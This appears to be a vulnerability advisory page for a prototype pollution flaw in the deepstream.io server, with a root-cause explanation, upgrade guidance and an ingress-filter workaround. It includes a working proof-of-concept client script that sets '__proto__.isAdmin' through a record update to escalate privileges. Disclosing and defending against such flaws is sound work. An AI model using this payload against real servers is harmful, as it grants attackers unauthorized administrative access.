CVE-2026-49252: @deepstream/server Prototype Pollution via Record Path
Any authenticated deepstream user with write access to a record can pollute the server's JavaScript prototype by sending a crafted path in a record update, potentially escalating their own privileges
The problem
deepstream.io versions before 10.0.5 pass attacker-controlled record paths directly into a server-side path-set operation without sanitizing reserved keys like `__proto__`, `constructor`, or `prototype`.
Because records are schema-less and the server merges patch paths into plain JavaScript objects, a low-privileged authenticated client can silently mutate `Object.prototype`. Any property injected this way is then inherited by every plain object on the server, enabling privilege escalation or logic bypass.
Proof of concept
A working proof-of-concept for CVE-2026-49252 in @deepstream/server, with the exact payload below.
// Authenticated deepstream client (ws-json or SDK)
// Sends a record PATCH with __proto__ as the path segment.
// This sets Object.prototype.isAdmin = true on the server.
const { DeepstreamClient } = require('@deepstream/client')
const client = new DeepstreamClient('ws://target:6020')
await client.login({ username: 'lowpriv', password: 'password' })
// record.set(name, path, value) -- path goes unsanitized into server-side
// path-based merge in versions <= 10.0.4
const record = client.record.getRecord('any-writable-record')
await record.whenReady()
// Pollute Object.prototype on the server
record.set('__proto__.isAdmin', true)
// or via setData:
client.record.setData('any-writable-record', '__proto__.isAdmin', true)deepstream's record handler accepts a dot-notation `path` argument in patch messages and resolves it with a recursive set utility. Before 10.0.5, there was no check that path segments were not `__proto__`, `constructor`, or `prototype`. Writing to `__proto__.x` resolves to `Object.prototype.x`, polluting the prototype chain for all plain objects on that Node.js process.
The CHANGELOG for 10.0.5 confirms a missing guard was added (commit 54b8e29). The advisory workaround independently confirms the exact attack surface: filter all messages whose path contains `__proto__`, `constructor`, or `prototype` before they enter the message pipeline.
The CVSS scope is "Changed" because the impact escapes the individual record and affects the entire server runtime (CWE-1321).
The fix
Upgrade `@deepstream/server` to **10.0.5** (commit 54b8e2958a98df444b5b5d9a66e22872afd84e44). If an immediate upgrade is not possible, add an ingress filter at the transport layer that rejects any message whose path field contains `__proto__`, `constructor`, or `prototype` before it reaches the server's message pipeline, as recommended in the official advisory.
Related research
- critical · 9.1CVE-2026-48714CVE-2026-48714: i18next-http-middleware Prototype Pollution via Dotted Missing-Key
- critical · 9.1CVE-2026-48713CVE-2026-48713: i18next-fs-backend Prototype Pollution via Crafted Missing-Key String
- high · 8.8CVE-2026-54504CVE-2026-54504: @andrea9293/mcp-documentation-server Unauthenticated Network API Exposure
- high · 7.5CVE-2026-50272CVE-2026-50272: dd-trace Unbounded W3C Baggage Extraction DoS